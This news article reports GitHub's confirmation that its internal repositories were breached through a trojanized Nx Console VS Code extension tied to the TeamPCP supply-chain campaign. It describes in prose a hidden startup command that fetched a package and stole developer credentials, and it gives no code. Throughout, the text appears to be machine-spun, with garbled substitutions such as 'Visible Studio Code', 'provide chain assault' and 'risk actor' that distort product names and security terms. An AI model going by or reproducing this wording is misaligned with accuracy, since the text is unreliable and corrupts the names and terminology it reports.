GitHub on Wednesday formally confirmed that the breach of its inner repositories was the results of a compromise of an worker machine involving a poisoned model of the Nx Console Microsoft Visible Studio Code (VS Code) extension.
The event comes because the Nx workforce revealed that the extension, nrwl.angular-console, was breached after one in every of its builders’ techniques was hacked within the wake of the latest TanStack provide chain assault, which has additionally impacted OpenAI, Mistral AI, and Grafana Labs.
“We’ve got no proof of affect to buyer data saved exterior of GitHub’s inner repositories, resembling our buyer’s personal enterprises, organizations, and repositories,” Alexis Wales, Chief Info Safety Officer of GitHub, mentioned in an announcement.
“A few of GitHub’s inner repositories include data from clients, for instance, excerpts of assist interactions. If any affect is found, we’ll notify clients through established incident response and notification channels.”
The assault is alleged to have allowed the risk actor, a cybercriminal group often called TeamPCP, to exfiltrate about 3,800 repositories. GitHub mentioned it has taken steps to include the incident and rotated essential secrets and techniques, including it is persevering with to watch the scenario for follow-on exercise.
In a put up on X, Jeff Cross, co-founder of Narwhal Applied sciences, the corporate behind nx.dev, mentioned, “this incident highlights that there should be deeper, extra basic modifications to how we and different maintainers want to consider securing developer tooling and open supply distribution.”
“We’re additionally starting conversations with different high-profile open supply maintainers about how we will work collectively on a number of the deeper structural issues round software program provide chain security. Plenty of the assumptions the ecosystem has operated underneath for years not maintain.”
In latest months, TeamPCP has quickly gained notoriety for large-scale software program provide chain assaults, particularly going after widely-used open-source tasks and security-adjacent instruments that builders depend on.
What’s notable right here is that the trojanized model of the VS Code extension was stay on Visible Studio Market just for eighteen minutes (between 12:30 p.m. and 12:48 p.m. UTC on Might 18, 2026). However this quick window was sufficient for the attackers to distribute a credential stealer able to harvesting delicate knowledge from 1Password vaults, Anthropic Claude Code configurations, npm, GitHub, and Amazon Internet Companies (AWS).
“The extension regarded and behaved like regular Nx Console, however on startup it silently ran a single shell command that downloaded and executed a hidden package deal from a planted commit on the official nrwl/nx GitHub repository,” OX Safety researcher Nir Zadok mentioned. “The command was disguised as a routine MCP setup process so it will not increase suspicion.”
The interlinked nature of recent software program has allowed TeamPCP to unleash a self-sustaining cycle of recent compromises. The sample that drives residence this side is deceptively easy because it’s nefarious: break into one trusted instrument, steal credentials from developer techniques which will set up it, and use these credentials to interrupt into the subsequent reputable instrument.
“Each standard extension market ships with auto-update on by default. VS Code, Cursor, the entire lineup,” Aikido security researcher Raphael Silva mentioned. “The reasoning is sensible in isolation, as a result of most builders by no means replace something manually, so leaving it off means a protracted tail of editors working stale, weak code.”
“The trade-off stops making sense when you account for hostile/compromised publishers. Auto-update offers an attacker who controls a launch a direct push channel into each machine working that extension. Marketplaces do not impose any evaluate gate or ready interval between when an replace is revealed and when put in shoppers pull it in.”
